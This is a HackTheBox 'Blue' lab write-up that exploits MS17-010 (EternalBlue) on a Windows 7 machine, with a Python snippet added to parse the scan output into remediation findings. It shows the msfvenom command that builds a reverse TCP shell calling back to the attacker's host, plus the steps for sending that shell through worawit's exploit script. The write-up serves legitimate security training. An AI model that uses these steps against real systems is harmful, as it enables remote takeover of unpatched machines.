HackTheBox Blue Writeup

Enjoy reading my HTB Blue Writeup


Information Gathering

Let's begin with an nmap scan to gather some information about the HTB Blue machine:

sudo nmap -p 1-5000 -sV -sC -O -v 10.10.10.40

We have three open ports:

Okay, so there does not seem to be Active Directory running, but we have a Windows machine with Windows 7 Professional SP1 installed.

Next, enumerate the SMB shares:

smbclient -L \\\\10.10.10.40\\

Without entering a password we were able to list the shares:

Enter WORKGROUP\user's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Share           Disk
	Users           Disk

I investigated the "Share" and "Users" shares but couldn't find anything interesting. Let's keep in mind that we are able to connect to those and move on.


Eternal Blue

I used the Python checker script from worawit's GitHub repository to check whether the HTB Blue machine got patched or is vulnerable to Eternal Blue. In fact, it didn't get patched:

└──╼ $python checker.py 10.10.10.40 445
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
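
For the reporting side of these two checks, the following added example (not part of the original writeup or of worawit's repository) parses the smbclient and checker output shown above into remediation findings. The function names and the severity labels are assumptions made for illustration.

```python
import re
# Tool output copied from this writeup (line-number debris stripped).
CHECKER_OUT = """\
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
"""
SHARES_OUT = """\
\tSharename       Type      Comment
\t---------       ----      -------
\tADMIN$          Disk      Remote Admin
\tC$              Disk      Default share
\tIPC$            IPC       Remote IPC
\tShare           Disk
\tUsers           Disk
"""

def parse_checker(text):
    """Extract target, OS string, patch verdict and named-pipe results."""
    target = re.search(r"Trying to connect to (\S+):(\d+)", text)
    os_line = re.search(r"^Target OS: (.+)$", text, re.M)
    _, _, pipe_part = text.partition("=== Testing named pipes ===")  # pairs follow the banner
    return {
        "host": target.group(1), "port": int(target.group(2)),
        "os": os_line.group(1).strip(), "unpatched": "The target is not patched" in text,
        "pipes": dict(re.findall(r"^(\w+): (\S+)", pipe_part, re.M)),
    }

def parse_shares(text):
    """Return (name, type, comment) rows; header and separator lines do not match."""
    return re.findall(r"^\s*(\S+)[ \t]+(Disk|IPC|Printer)[ \t]*(.*?)[ \t]*$", text, re.M)

def findings(checker_text, shares_text):
    """Turn both outputs into (severity, message) remediation items."""
    c, out = parse_checker(checker_text), []
    if c["unpatched"]:
        out.append(("high", f"{c['host']}:{c['port']} ({c['os']}) lacks the MS17-010 update"))
    # Names ending in '$' are the hidden administrative shares; the rest were created on the host.
    custom = [name for name, _type, _comment in parse_shares(shares_text) if not name.endswith("$")]
    if custom:
        out.append(("medium", "shares listed without a password: " + ", ".join(custom)))
    return out
```

Calling `findings(CHECKER_OUT, SHARES_OUT)` yields one item for the missing update and one for the "Share" and "Users" shares that were listed without a password.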

Generate a payload using msfvenom in order to gain a reverse TCP shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.180 LPORT=9988 -f exe > payload.exe

Next we have to modify the send_and_execute.py script from worawit.

Replace username='' with username='guest'.

Then we can start a netcat listener and send the payload to the target machine:

python send_and_execute.py 10.10.10.40 payload.exe 445

The user flag is located in C:\Users\haris\Desktop and the root flag in the Desktop directory of Administrator.


Tags:

HTB, HackTheBox, Blue, MS17-010